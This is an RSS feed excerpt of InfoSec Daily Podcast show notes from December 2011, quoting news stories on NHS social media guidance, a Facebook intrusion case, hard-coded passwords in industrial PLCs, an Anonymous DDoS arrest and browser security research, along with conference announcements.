	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The author of recent guidance on using social media for nurses and midwives says NHS managers should be able to actively respond to issues around how their staff use social media.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Andy Jaeger, assistant director of public and professional communications at the Nursing and Midwifery Council (NMC) and author of recent guidance on social media, says that NHS managers must be better equipped to handle issues around social media.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The regulator has seen an increase in the number of enquiries from nurses and midwives about social media and referrals that directly relate to social networking, but despite this there are still managers who are &quot;social media refuseniks&quot;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;One of things that we say in our advice is that if a manager has responsibility for investing in a complaint about the use of a social networking site, that they should join the social networking site so that they understand the mechanics of how it works. People need to familiarise themselves with this kind of thing,&quot; he says.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I think actually what it needs is a robust response at a local level. In our advice much of what we&#39;ve done is interpret the standards that already exist around conduct, performance and ethics. We&#39;re just helping people to understand what it is that is going on and then act appropriately.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But he says: &quot;that really is better done not with a set of national guidelines from the Department of Health, but with local managers taking responsibility and understanding the issue and dealing with it for themselves.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.youhavedownloaded.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.youhavedownloaded.com/</span></a><br />
	<a href="http://www.youhavedownloaded.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">YouHaveDownloaded.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> is a site that monitors 20% of all public downloads, immediately telling you if you are a downloader or not, and even if you&rsquo;re found &quot;not guilty,&quot; then you&rsquo;re suspected of using a private torrent tracker.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course, you can check to see if other people have downloaded something and if you want to scare them, you can do so with a special feature offered by the site. Widgets for websites, blogs and even Facebook profiles are made available for customers.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Suren Ter, Ruslan K and Ilia R are the masterminds behind YouHaveDownloaded.com. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I&rsquo;m a producer of the site. Like a movie producer, I made the site. Russlan is a visionary. He did the necessary research and invented the technical tricks. Ilia is a programmer. He does the code. You see those tables, html and widgets? He did it. Me? I don&rsquo;t do code, I don&rsquo;t do research, I don&rsquo;t do design &mdash; I do sites,&rdquo; Suren Ter says.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.mirror.co.uk/news/top-stories/2011/12/14/facebook-hacker-admits-breaking-into-social-network-s-servers-115875-23633578/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.mirror.co.uk/news/top-stories/2011/12/14/facebook-hacker-admits-breaking-into-social-network-s-servers-115875-23633578/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A COMPUTER hacker yesterday admitted breaking into Facebook&rsquo;s servers. &nbsp;Glenn Mangham, 26, repeatedly breached the social network website this year in what a court heard was one of the most shocking examples of its kind.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Southwark crown court heard Mangham &shy;downloaded his own programmes on to the internal server.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prosecutor Sandip Patel said: &ldquo;He was able to access the private side of Facebook and steal highly sensitive intellectual property. Private data was not compromised&#8230; it was never the intention to compromise customer data.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But he added: &ldquo;It was and is the most effective and egregious examples of hacking into a website that has come before a British court.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mangham, of York, admitted four hacking charges. He said he aimed to identify weak spots in Facebook&rsquo;s security.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mangham was released on bail and will be sentenced on February 17.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.theregister.co.uk/2011/12/14/scada_bugs_threaten_criticial_infrastructure/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/14/scada_bugs_threaten_criticial_infrastructure/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An electronic device used to control machinery in water plants and other industrial facilities contains serious weaknesses that allow attackers to take it over remotely, the US agency that safeguards the nation&#39;s critical infrastructure has warned.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some models of the </span><a href="http://products.schneider-electric.us/products-services/products/plcs-pac-and-distributed-io/industrial-process-infrastructure-and-oems/quantum-plc/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Modicon Quantum PLC</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> used in industrial control systems contain multiple hidden accounts that use predetermined passwords to grant remote access, the Industrial Control System Cyber Emergency Response Team said in an </span><a href="http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-346-01.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">advisory</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (PDF) issued on Tuesday. Palatine, Illinois&ndash;based Schneider Electric, the maker of the device, has produced fixes for some of the weaknesses and continues to develop additional mitigations.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The PLCs, or programmable logic controllers, reside at the lowest levels of an industrial plant, where computerized sensors meet the valves, turbines, or other machinery that&#39;s being controlled. The default passwords are hard-coded into Ethernet cards the systems use to funnel commands into the devices, and temperatures and other data out of them. The Ethernet modules also allow administrators to remotely log into the machinery using protocols such as telnet, FTP, and something called the Windriver Debug port.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a </span><a href="http://reversemode.com/index.php?option=com_content&amp;task=view&amp;id=80&amp;Itemid=1"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog post</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> published on Monday by independent security researcher Rub&eacute;n Santamarta, the NOE 100 and NOE 771 modules contain at least 14 hard-coded passwords, some of which are published in support manuals. Even in cases where the passcodes are obscured using cryptographic hashes, they are trivial to recover thanks to </span><a href="https://community.rapid7.com/community/metasploit/blog/2010/08/02/shiny-old-vxworks-vulnerabilities"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">documented weaknesses in the underlying VxWorks operating system</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. As a result, attackers can exploit the weakness to log into devices and gain privileged access to its controls.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.thedailybeast.com/articles/2011/12/13/anonymous-hacker-arrested-for-attack-on-gene-simmons-s-website.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thedailybeast.com/articles/2011/12/13/anonymous-hacker-arrested-for-attack-on-gene-simmons-s-website.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A member of the international hacker group Anonymous was arrested this morning after he conducted a sophisticated cyberattack on a website operated by KISS rocker and Family Jewels star Gene Simmons. Kevin George Poe, 24, was taken into custody by federal authorities at his home in Manchester, Conn. He is charged with two federal counts of conspiracy and unauthorized impairment of a protected computer. If convicted, Poe could face up to 15 years in federal prison.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We evaluated servers and were able to discern an IP address that brought us to him,&rdquo; said Thom Mrozek, a spokesman for the U.S. Attorney&rsquo;s Office in Los Angeles. &ldquo;There was a significant amount of forensic work involved. We are dealing with a group that is quite sophisticated and will take efforts to conceal their identity.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week, a federal grand jury in Los Angeles returned an indictment that accused Poe, who used the screen name spydr101, of allegedly conducting an elaborate distributed denial of service (DDoS) against Simmons&rsquo;s website, GeneSimmons.com. The cyberattack sent tens of thousands of electronic requests to Simmons&rsquo;s website with the purpose of overloading the computer server and rendering the website useless. According to the indictment, Poe used a software tool that is widely used by Anonymous called Low Orbit Ion Cannon, which is a computer program that sends extremely large numbers of &ldquo;packets&rdquo; or requests over a network in an attempt to sabotage a computer.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cyberattack occurred during a five-day period in October 2010 as part of Operation Payback, a long-running campaign by Anonymous to sabotage organizations that are involved in anti-piracy campaigns such as the Recording Industry Association of America and the Motion Picture Association of America.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-546-pentest-lessons-back-to-paper-social-media-refuseniks-youhavedownloaded-scada-gene-simmons-ddos/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3274/0/infosec-daily-podcast-episode-546.mp3" length="17108259" type="audio/mpeg" />
		<itunes:duration>0:35:36</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 546 for December 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.

	Announcements:
Brad Smith (theNurse)
	We all know and love Brad S[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 546 for December 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.

	Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
&#8220;Pentest Lessons&#34;

	Lesson 1. Boris needs his coffee before any attempts at humor can be made.
	Lesson 2. &#8220;As long as the perimeter is secure, nothing else matters.&#8221;
	Lesson 3. Never say &#8220;Oh, shit!&#8221; or &#8220;God Damn It!&#8221; on a customer location
	Lesson 4. &#8220;How did you bypass SSL like that?&#8221;
	Lesson 5. &#160;When you pop a box during an internal assessment, don&#8217;t shout out &#8220;I own that shiz&#8221;
	Lesson 6. &#8220;Don&#8217;t ever include anything in report that wasn&#8217;t part of scope&#8221;
Lesson 7. If you get detained/arrested during an engagement, never say &#8220;Is that tazer real?&#8221;
Lesson 8. If you can&#8217;t make it through the door on your own a Latina always works
Lesson 9. Don&#8217;t click suspicious links on client owned hardware or machines with client data on it
Lesson 10. Don&#8217;t add Linkedin connections based on you&#8217;re friends acceptance.
&#160;
Stories
Source: http://www.wsbtv.com/news/news/local/hospital-diverting-trauma-cases-due-computer-probl/nFyYY/
	The Gwinnett Medical Center in Lawrenceville, Georgia, suffered a serious computer virus infection that temporarily disabled their services, the medical facility being able to provide help only to those who had extreme emergencies.
	WSBTV reports that the virus affected the hospital&#8217;s networks, employees being forced to turn back to the good old fashioned paper and pen to perform their tasks.
	&#8220;We&#39;ve had a virus to interrupt our system within our hospital,&#8221; revealed a Gwinnett Medical Center representative. &#8220;It&#39;s not affecting patient care in any way, shape or form.&#8221;
	Fortunately, only the network connections were affected by the virus that allegedly quickly spread from a device to the other. The databases that contain medical records and other patient information were not harmed.
	On Wednesday, the facility declared &#8220;total diversion,&#8221; which resulted in the fact that most of the patients had to be redirected to other hospitals. Two days later the status changed to [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 545 &#8211; Most Secure Browser, A Few Chinese, WinPhones, Industrial Espionage, Nitro &amp; Addicted Workers</title>
		<link>http://www.isdpodcast.com/episode-545-most-secure-browser-a-few-chinese-winphones-industrial-espionage-nitro-addicted-workers</link>
		<comments>http://www.isdpodcast.com/episode-545-most-secure-browser-a-few-chinese-winphones-industrial-espionage-nitro-addicted-workers#comments</comments>
		<pubDate>Wed, 14 Dec 2011 01:56:43 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3269</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 545 for December 13, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Themson Mester. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 545 for December 13, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Themson Mester.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.accuvant.com/blog/2011/12/05/which-web-browser-is-most-secured"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.accuvant.com/blog/2011/12/05/which-web-browser-is-most-secured</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Accuvant LABS has just released some new research that compares the security of three of the most widely used web browsers &ndash; Mozilla Firefox, Google Chrome, and Microsoft Internet Explorer. Google commissioned Accuvant to perform this comprehensive and independently designed security analysis to help advance the discussion of best practices in the security community. &nbsp;Our research findings are extremely thorough and complete, so we decided to create this blog to summarize the results.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Malware, spyware and viruses are all too familiar to those who regularly surf the web. These malicious programs can lead to system pop-ups, slowdowns, account takeovers, credit card theft, identity theft, and the theft of personally identifiable information. While antivirus and anti-malware can help prevent an infection, the first line of defense is using a secure web browser. For a person that surfs the internet, comparing and contrasting the security of different web browsers is difficult. Marketing materials are available to the average user, but they often contain direct contradictions and the reader ends up wondering which web browser is the most secure. Our research aims to fix that problem. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We compared browsers from a layered perspective, taking into account security architecture and anti-exploitation techniques. &nbsp;&nbsp;Like antivirus or anti-malware software, each provides an additional layer of defense. The nice thing is, when anti-exploitation technology prevents an attack, anti-malware and antivirus aren&#39;t needed. The idea is that it&rsquo;s a lot easier to keep a fortress with a moat safe than it is to protect a beach shack.</span><br />
